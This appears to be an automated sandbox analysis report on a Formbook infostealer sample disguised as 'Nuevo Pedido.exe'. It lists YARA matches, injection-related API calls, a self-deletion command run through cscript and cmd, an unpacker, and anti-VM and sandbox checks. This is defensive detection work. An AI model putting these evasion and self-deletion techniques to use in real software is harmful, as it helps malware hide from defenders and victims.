            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: String function: 019BB150 appears 35 times
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: String function: 0477B150 appears 35 times
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_004185E0 NtCreateFile,3_2_004185E0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_00418690 NtReadFile,3_2_00418690
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_00418710 NtClose,3_2_00418710
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_004187C0 NtAllocateVirtualMemory,3_2_004187C0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_004185DA NtCreateFile,3_2_004185DA
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_0041870C NtReadFile,NtClose,3_2_0041870C
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_004187BA NtAllocateVirtualMemory,3_2_004187BA
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F99A0 NtCreateSection,LdrInitializeThunk,3_2_019F99A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_019F9910
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_019F98F0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9840 NtDelayExecution,LdrInitializeThunk,3_2_019F9840
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_019F9860
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_019F9A00
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9A20 NtResumeThread,LdrInitializeThunk,3_2_019F9A20
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9A50 NtCreateFile,LdrInitializeThunk,3_2_019F9A50
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F95D0 NtClose,LdrInitializeThunk,3_2_019F95D0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9540 NtReadFile,LdrInitializeThunk,3_2_019F9540
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9780 NtMapViewOfSection,LdrInitializeThunk,3_2_019F9780
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_019F97A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9FE0 NtCreateMutant,LdrInitializeThunk,3_2_019F9FE0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9710 NtQueryInformationToken,LdrInitializeThunk,3_2_019F9710
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_019F96E0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_019F9660
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F99D0 NtCreateProcessEx,3_2_019F99D0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9950 NtQueueApcThread,3_2_019F9950
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F98A0 NtWriteVirtualMemory,3_2_019F98A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9820 NtEnumerateKey,3_2_019F9820
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019FB040 NtSuspendThread,3_2_019FB040
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019FA3B0 NtGetContextThread,3_2_019FA3B0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9B00 NtSetValueKey,3_2_019F9B00
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9A80 NtOpenDirectoryObject,3_2_019F9A80
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9A10 NtQuerySection,3_2_019F9A10
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F95F0 NtQueryInformationFile,3_2_019F95F0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019FAD30 NtSetContextThread,3_2_019FAD30
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9520 NtWaitForSingleObject,3_2_019F9520
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9560 NtWriteFile,3_2_019F9560
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019FA710 NtOpenProcessToken,3_2_019FA710
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9730 NtQueryVirtualMemory,3_2_019F9730
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019FA770 NtOpenThread,3_2_019FA770
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9770 NtSetInformationFile,3_2_019F9770
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9760 NtOpenProcess,3_2_019F9760
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F96D0 NtCreateKey,3_2_019F96D0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9610 NtEnumerateValueKey,3_2_019F9610
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9650 NtQueryValueKey,3_2_019F9650
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 3_2_019F9670 NtQueryInformationProcess,3_2_019F9670
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9540 NtReadFile,LdrInitializeThunk,16_2_047B9540
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B95D0 NtClose,LdrInitializeThunk,16_2_047B95D0
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9660 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_047B9660
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9650 NtQueryValueKey,LdrInitializeThunk,16_2_047B9650
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B96E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_047B96E0
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B96D0 NtCreateKey,LdrInitializeThunk,16_2_047B96D0
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9710 NtQueryInformationToken,LdrInitializeThunk,16_2_047B9710
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9FE0 NtCreateMutant,LdrInitializeThunk,16_2_047B9FE0
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9780 NtMapViewOfSection,LdrInitializeThunk,16_2_047B9780
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9860 NtQuerySystemInformation,LdrInitializeThunk,16_2_047B9860
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9840 NtDelayExecution,LdrInitializeThunk,16_2_047B9840
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_047B9910
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B99A0 NtCreateSection,LdrInitializeThunk,16_2_047B99A0
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9A50 NtCreateFile,LdrInitializeThunk,16_2_047B9A50
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9560 NtWriteFile,16_2_047B9560
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047BAD30 NtSetContextThread,16_2_047BAD30
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9520 NtWaitForSingleObject,16_2_047B9520
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B95F0 NtQueryInformationFile,16_2_047B95F0
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9670 NtQueryInformationProcess,16_2_047B9670
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9610 NtEnumerateValueKey,16_2_047B9610
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9770 NtSetInformationFile,16_2_047B9770
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047BA770 NtOpenThread,16_2_047BA770
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9760 NtOpenProcess,16_2_047B9760
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9730 NtQueryVirtualMemory,16_2_047B9730
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047BA710 NtOpenProcessToken,16_2_047BA710
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B97A0 NtUnmapViewOfSection,16_2_047B97A0
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047BB040 NtSuspendThread,16_2_047BB040
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9820 NtEnumerateKey,16_2_047B9820
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B98F0 NtReadVirtualMemory,16_2_047B98F0
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B98A0 NtWriteVirtualMemory,16_2_047B98A0
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9950 NtQueueApcThread,16_2_047B9950
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B99D0 NtCreateProcessEx,16_2_047B99D0
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9A20 NtResumeThread,16_2_047B9A20
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9A10 NtQuerySection,16_2_047B9A10
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9A00 NtProtectVirtualMemory,16_2_047B9A00
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9A80 NtOpenDirectoryObject,16_2_047B9A80
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047B9B00 NtSetValueKey,16_2_047B9B00
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_047BA3B0 NtGetContextThread,16_2_047BA3B0
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_006185E0 NtCreateFile,16_2_006185E0
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_00618690 NtReadFile,16_2_00618690
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_00618710 NtClose,16_2_00618710
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_006187C0 NtAllocateVirtualMemory,16_2_006187C0
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_006185DA NtCreateFile,16_2_006185DA
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_0061870C NtReadFile,NtClose,16_2_0061870C
            Source: C:\Windows\SysWOW64\cscript.exe, Code function: 16_2_006187BA NtAllocateVirtualMemory,16_2_006187BA
            Source: Nuevo Pedido.exeBinary or memory string: OriginalFilename vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.242885207.0000000005EF0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.243408230.0000000006390000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000003.00000002.309549800.0000000001C3F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exeBinary or memory string: OriginalFilenameMethodImplAttribut.exe. vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: Nuevo Pedido.exeVirustotal: Detection: 32%
            Source: Nuevo Pedido.exeReversingLabs: Detection: 33%
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeFile read: C:\Users\user\Desktop\Nuevo Pedido.exe:Zone.IdentifierJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Nuevo Pedido.exe "C:\Users\user\Desktop\Nuevo Pedido.exe"
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess created: C:\Users\user\Desktop\Nuevo Pedido.exe C:\Users\user\Desktop\Nuevo Pedido.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess created: C:\Users\user\Desktop\Nuevo Pedido.exe C:\Users\user\Desktop\Nuevo Pedido.exeJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"Jump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nuevo Pedido.exe.logJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@11/6
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_01
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
            Source: Nuevo Pedido.exeString found in binary or memory: /MethodImplAttribut;component/views/addbook.xaml
            Source: Nuevo Pedido.exeString found in binary or memory: views/addbook.baml
            Source: Nuevo Pedido.exeString found in binary or memory: /MethodImplAttribut;component/views/addcustomer.xaml
            Source: Nuevo Pedido.exeString found in binary or memory: views/addcustomer.baml
            Source: Nuevo Pedido.exeString found in binary or memory: a/MethodImplAttribut;component/views/addbook.xamlw/MethodImplAttribut;component/views/borrowfrombookview.xamlm/MethodImplAttribut;component/views/borrowingview.xamlg/MethodImplAttribut;component/views/changebook.xamlo/MethodImplAttribut;component/views/changecustomer.xamlk/MethodImplAttribut;component/views/customerview.xamlo/MethodImplAttribut;component/views/deletecustomer.xamle/MethodImplAttribut;component/views/errorview.xamli/MethodImplAttribut;component/views/smallextras.xamli/MethodImplAttribut;component/views/addcustomer.xaml
            Source: Nuevo Pedido.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Nuevo Pedido.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Nuevo Pedido.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Nuevo Pedido.exe, Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
            Source: Binary string: cscript.pdb source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: Nuevo Pedido.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.Nuevo Pedido.exe.a80000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.Nuevo Pedido.exe.a80000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.Nuevo Pedido.exe.de0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_00A892F5 push ds; ret 0_2_00A89340
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_00A89361 push ds; retf 0_2_00A89364
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_00A89347 push ds; ret 0_2_00A8934C
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_056356E0 push esp; iretd 0_2_056356E9
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041B822 push eax; ret 3_2_0041B828
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041B82B push eax; ret 3_2_0041B892
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041B88C push eax; ret 3_2_0041B892
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004153E6 push ss; iretd 3_2_004153EC
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041541E push ss; iretd 3_2_004153EC
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041B7D5 push eax; ret 3_2_0041B828
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00DE92F5 push ds; ret 3_2_00DE9340
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00DE9347 push ds; ret 3_2_00DE934C
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00DE9361 push ds; retf 3_2_00DE9364
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A0D0D1 push ecx; ret 3_2_01A0D0E4
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047CD0D1 push ecx; ret 16_2_047CD0E4
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061B822 push eax; ret 16_2_0061B828
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061B82B push eax; ret 16_2_0061B892
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061B88C push eax; ret 16_2_0061B892
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_006153E6 push ss; iretd 16_2_006153EC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061541E push ss; iretd 16_2_006153EC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061B7D5 push eax; ret 16_2_0061B828
            Source: initial sampleStatic PE information: section name: .text entropy: 7.85660170333

            Hooking and other Techniques for Hiding and Protection:

            Self deletion via cmd delete
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            Yara detected AntiVM3
            Source: Yara matchFile source: 0.2.Nuevo Pedido.exe.2dd8e9c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nuevo Pedido.exe.2e6b054.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Nuevo Pedido.exe PID: 6320, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000608604 second address: 000000000060860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 000000000060899E second address: 00000000006089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
